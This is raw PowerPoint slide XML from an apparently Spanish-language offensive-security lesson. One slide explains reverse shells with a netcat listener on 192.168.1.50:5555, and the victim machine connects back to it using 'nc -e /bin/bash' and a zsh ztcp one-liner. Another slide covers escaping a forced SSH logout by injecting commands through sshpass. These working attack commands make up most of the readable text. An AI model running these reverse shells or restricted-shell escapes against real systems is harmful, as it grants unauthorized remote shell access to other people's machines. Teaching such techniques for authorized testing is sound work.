                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> : 192.168.1.50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>5555</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pP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Luego la máquina víctima deberá ejecutar : </a:t>
            </a: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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>192.168.1.50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-e /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1538298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444870" y="204057"/>
            <a:ext cx="9671050" cy="559342"/>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2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Crear una reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Shell con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>zsh</a:t>
            </a:r>
            <a:endParaRPr sz="28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46872" y="852763"/>
            <a:ext cx="10160000" cy="5891824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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	</a:t>
            </a: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Primero creamos el servidor en nuestro equipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ej</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> : 192.168.1.50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>5555</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pP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Luego la máquina víctima deberá ejecutar : </a:t>
            </a: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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>zsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> -c '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>zmodload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>zsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ztcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>192.168.1.50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> 5555 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>zsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> &gt;&amp;$REPLY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>&gt;&amp;$REPLY &lt;&amp;$REPLY'</a:t>
            </a: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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1903387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444870" y="204056"/>
            <a:ext cx="9671050" cy="769937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="FEFEFE"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Comprometer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>conexiones SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1° (Saltar expulsión configurada en el archivo Shell del usuario)</a:t>
            </a:r>
            <a:endParaRPr sz="24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63650" y="1054099"/>
            <a:ext cx="10160000" cy="5326321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Si aun con credenciales al ingresar a un servidor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> este nos expulsa, podemos probar inyectar comandos en la línea, se recomienda intentar abrir una terminal por ejemplo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sshpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;contraseña&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>usuario@dirección</a:t>
            </a:r>
            <a:r>
